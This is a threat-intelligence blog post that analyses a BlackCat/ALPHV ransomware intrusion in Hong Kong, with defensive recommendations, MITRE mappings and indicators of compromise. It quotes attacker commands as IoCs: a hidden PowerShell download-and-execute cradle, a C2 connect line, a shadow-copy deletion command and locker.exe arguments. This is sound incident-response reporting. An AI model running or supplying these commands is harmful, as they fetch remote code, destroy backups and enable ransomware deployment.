The Black Cat’s Out of the Bag
Dark Lab responded to a lesser seen ransomware breed in Hong Kong attributable to ALPHV/BlackCat. We outline the tactics, techniques and procedures of the threat actor, and share our recommendations to ensure readers do not have a cat in hell’s chance of becoming the next victim.
In the second half of 2022, Dark Lab responded to an incident impacting a non-profit professional services organization in Hong Kong. Available evidence suggests that one of the affiliates of the cybercriminal group ALPHV, otherwise known as BlackCat Ransomware-as-a-Service (RaaS), were likely behind the incident.
Reports of BlackCat first emerged in mid-November 2021, and the RaaS group swiftly gained notoriety for their use of the unconventional programming language RUST, their flexibility to self-propagate and target multiple devices and operating systems, and a growing affiliate base with previous links to prolific threat activity groups including DarkSide/BlackMatter and Lockbit 2.0 RaaS programmes. The financially motivated cybercriminal groups’ targets are selected opportunistically rather than with an intent to target specific sectors or geographies but have been observed from their leak site as of 31 August 2022 to have successfully targeted 136 organisations across the United States, Europe, and the Asia Pacific region.
BlackCat is a lesser seen ransomware breed in Hong Kong. However, we posit they may continue to target the region, due to their opportunistic nature and scalability through their affiliate network. In this blog, we will analyse Dark Lab’s recent encounter with BlackCat, their Tactics, Techniques, and Procedures (TTPs), and share insights and recommendations on how to detect and respond to prospective attacks.
Analysis and Exploitation in the wild
Based on the available audit logs, the threat actor likely leveraged a critical remote code execution vulnerability
CVE-2019-0708 or BlueKeep in Remote Desktop Services – formerly known as Terminal Services – that affects selected older versions of Windows. To exploit this vulnerability, an unauthenticated attacker would need to send a specially crafted request to the target systems Remote Desktop Service via Remote Desktop Protocol (RDP). An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system, including installing programs; view, change, or delete data; or create new accounts with full user rights. It should be noted that the RDP service itself is not vulnerable.
It was observed over the first three (3) days that the three of five (3 of 5) potentially malicious IP addresses to gain access to the vulnerable workstation in the victim environment, which was exposed to the Internet. The first two IP addresses logged in one day apart, and per various public sources have been flagged as potentially malicious dating back to December 2021. The time spent in the environment was observed to be minimal and no more than a couple of hours combined, with specific execution of the Advanced Port Scanner and Mimikatz observed in the second session. More details will be elaborated in the next section.
Meanwhile, the third IP address was not previously reported to be malicious. The time spent in the environment was increased to almost eight (8) hours, though based on the available audit logs we were unable to ascertain the actions of the threat actor. Notably, the threat actor then remained silent for slightly over one (1) week between the initial login from the third IP address to the subsequent login of the fourth IP address. A fifth IP address was also observed to have logged on to the vulnerable workstation thereafter.
While we are unable to attribute any of those five (5) IP addresses to specific threat actors, we hypothesize that there are two groups of threat actors – the first being an initial access broker as categorized by the first two IP addresses, and the second being the BlackCat affiliate as categorized by the remaining three IP addresses.
|Suspected Threat Actor||Country||Reported Malicious||Reported Malicious on OSINT Platforms||Days of Access||Reported Malicious on OSINT Platforms|
|Initial Access Broker||Belize||Yes||April 2022||Day 1||5 mins|
|Initial Access Broker||Russia||Yes||June 2022||Day 2||1 hour|
|BlackCat Affiliate||Russia||No||–||Day 3||7 hours|
|BlackCat Affiliate||USA||No||–||Day 10||9 hours|
|BlackCat Affiliate||USA||No||–||Day 10||2 days 4 hours|
Through investigation into the user account compromised, we determined that the victim’s device was unknowingly exposed to the Internet due to a multi-homing issue, whereby their device was connected to both the corporate network as well as a standalone network with an external firewall and network configurations and that exposed the device to the Internet. It was further observed that the workstation had not been updated for multiple years, leaving the device unpatched and vulnerable to exploitation.
|First Published Date||26 November 2018|
|Affected Versions||Windows 7, Windows Server 2008 R2, Windows Server 2008 and earlier.|
|Description||A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Remote Desktop Services Remote Code Execution Vulnerability.|
|Potential Impact||Remote Code Execution Vulnerability enables threat actors to gain initial access and execute the malicious code.|
|Proof of Concept (PoC) Available||Yes|
|Exploited in the Wild||Yes|
|Patch Available||Yes. Update to Windows Server 2012 or above.|
We highly recommend installing the latest Windows version for patches against additional unrelated vulnerabilities.
|Workaround Available||Microsoft has provided potential workarounds:|
• Disable Remote Desktop Services if they are not required.
• Enable Network Level Authentication (NLA) on systems running supported editions of the affected Windows versions.
• Block TCP port 3389 at the enterprise perimeter firewall.
Credential Access and Discovery by Suspected Initial Access Broker
We observed the threat actor deployed Advanced Port Scanner to scan the network for open ports on network computers to identify weakened pathways.
The threat actor proceeded to execute Mimikatz to dump the Local Security Authority Server Service (LSASS) process memory and obtain various credentials, including an account with domain administrator rights. This credential was later used for lateral movement.
Handover to Suspected BlackCat Affiliate for Further Discovery and Command & Control
It was observed that the threat actor executed a PowerShell command, Cobalt Strike BEACON (beacon.exe)  to initiate a connection with their command-and-control (C2) server, establishing a foothold on the victim network. The C2 enabled remote access to the environment without RDP, as well as further infiltration by leveraging various features provided by the implant.
The threat actor established a connection to a Cobalt Strike Beacon hosted on a public cloud server, potentially to collect their various toolkits by executing this command:
powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http:///a’). Subsequently, the threat actor deployed AdFind.exe  to perform active directory reconnaissance, enabling them to retrieve a list of accounts within the network.
BlackCat affiliates have been observed in the past to leverage AdFind.exe in conjunction with PowerShell to establish a persistent foothold on a target network, and thereafter downloading and executing malicious payloads. The fact that the threat actor did this only from the fourth and fifth IP instead of the first three IP addresses lends more credence to the hypothesis that we make that the first set of IP addresses were initial access broker.
Through their enumeration of the victim’s environment, the threat actor was able to identify their critical systems ideal for targeting, including the domain controller server, back-up servers, and the anti-virus management server. It was observed by the threat actor that the anti-virus management server had no Endpoint Detection and Response (EDR) installed. Selective targeting of critical systems with no EDR coverage is a common practice among sophisticated threat actors as they present an ideal environment for attackers to arbitrate their attack while stealthily evading detection.
Subsequent to identifying the critical systems, the threat actor leveraged the stolen domain administrator account to initiate a remote desktop (RDP) connection. This enabled the threat actor to laterally move from the compromised multihoming workstation to the targeted endpoints due to the flat network environment, as a result of basic or lack of network segmentation in place.
It was observed that the threat actor exercised various acts of defense evasion through the use of masquerading tools and lateral movement. A key indicator tying this incident to BlackCat RaaS is the renaming of their tools an evasive manoeuvre often used by BlackCat affiliates to hide their malicious tools and make the process appear as if it is the original Windows svchost process.
The threat actor proceeded to manually deploy the malware on the anti-virus management server, initiating the self-propagation process whilst deploying rclone.exe to exfiltrate the data to their cloud storage hosted on MEGACloud. Notably, while the New Zealand cloud service, MEGACloud, is a legitimate and trusted platform, it is also a popular service for hackers due to the platform’s unique payment feature allowing users to pay by Bitcoin.
It has been reported by security researchers that BlackCat affiliates leverage rclone.exe to collect and exfiltrate extensive amounts of data from their victim’s network. The threat actor executed the following command to exfiltrate data from the target network:
The threat actor exercised encryption of the exfiltrated data and executed locker.exe on various endpoints with the following commands:
C:\Windows\locker.exe" --child --access-token --verbose
C:\Windows\locker.exe" --access-token -v --no-prop-servers \ –propagated
The commands activate the BlackCat payload. Command 2 provides an indicator (“no-props-servers”) that the malware has the capability to self-propagate, but the threat actor strategically targeted critical servers for propagation, omitting servers likely to detect their movements.
It is worth noting that self-propagation is not a common feature of ransomwares. Ultimately, the goal of threat actors is to gain a foothold on a network as quick as possible for exfiltration and extortion. Self-propagation can work against this need for speed, as it requires time in the resource development phase to enumerate the network and select their targets, as well as a manual deployment of the attack. With that said, after the initial deployment the BlackCat ransomware is able to self-propagate, scaling across the network quickly – establishing their foothold whilst evading detection.
BlackCat affiliates work on behalf of the BlackCat group to conduct human-operated ransomware campaigns, opportunistic in nature. With a sophisticated toolkit, various evasion tactics including the RUST-written malware and self-propagating features, BlackCat RaaS poses a significant threat to organisations with conventional security systems. Organisations are encouraged to review the TTPs leveraged by BlackCat affiliates as a result of our recent incident response experience to improve their preventative and detective controls.
As mentioned in the previous blog posts, defending against human-operated ransomware incidents are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop of those already listed in the previous blog post:
- Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to defend against human-operated ransomware incidents.
- Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
- Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
- Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as ensuring coverage of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.
- Perform malicious account and group policy creation to identify unauthorized changes and misconfigurations in your organisation’s network environment
- Regularly perform a review for network and host-based assets for complete stock-taking to identify unpatched or misconfigured devices. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
- Create a blacklist for the identified indicators of compromise (“IOC”) shared below to enable network-wide blocking and detection of attempted entry or attack and set up ongoing monitoring on the dark web and BlackCat leak site.
In addition, we strongly urge organisations that have deployed the vulnerable versions of Windows operating systems to execute the remediation actions outlined in the blog post, if not already completed.
MITRE ATT&CK TTPs Leveraged
We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.
- Active Scanning – T1595
- Gather Victim Identity Information: Credentials – T1589.001
- Credential Dumping – T1003
- Account Discovery: Domain Account – T1087.002
- Valid Accounts – T1078
- Domain Accounts – T1078.002
- Command and Scripting Interpreter – T1059
- External Remote Services – T1133
- Domain Trust Discovery – T1482
- Remote System Discovery – T1018
- Impair Defenses – T1562
- OS Credential Dumping – T1003
- File and Directory Discovery – T1083
- Network Service Discovery – T1046
- Network Share Discovery – T1135
- System Information Discovery – T1082
- Remote Access Software – T1219
- Data Encrypted for Impact – T1486
- Service Stop – T1489
- Web Service – T1102
- Lateral Tool Transfer – T1570
- Remote Services – T1021
- System Services: Service Execution – T1569.002
- Ingress Tool Transfer – T1105
- Remote Services: SMB/Windows Admin Shares – T1021.002
- Exfiltration Over Web Service: Exfiltration to Cloud Storage – T1567.002
- Transfer Data to Cloud Account – T1537
- Data Encrypted for Impact – T1486
Indicators of Compromise (IoCs)
|svchost.exe -connect ip:8443 -pass password||Process execution|
|powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring(“http[:]//ip[:]80/a’))||Powershell execution|
|C:\windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet||Command Execution|
Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.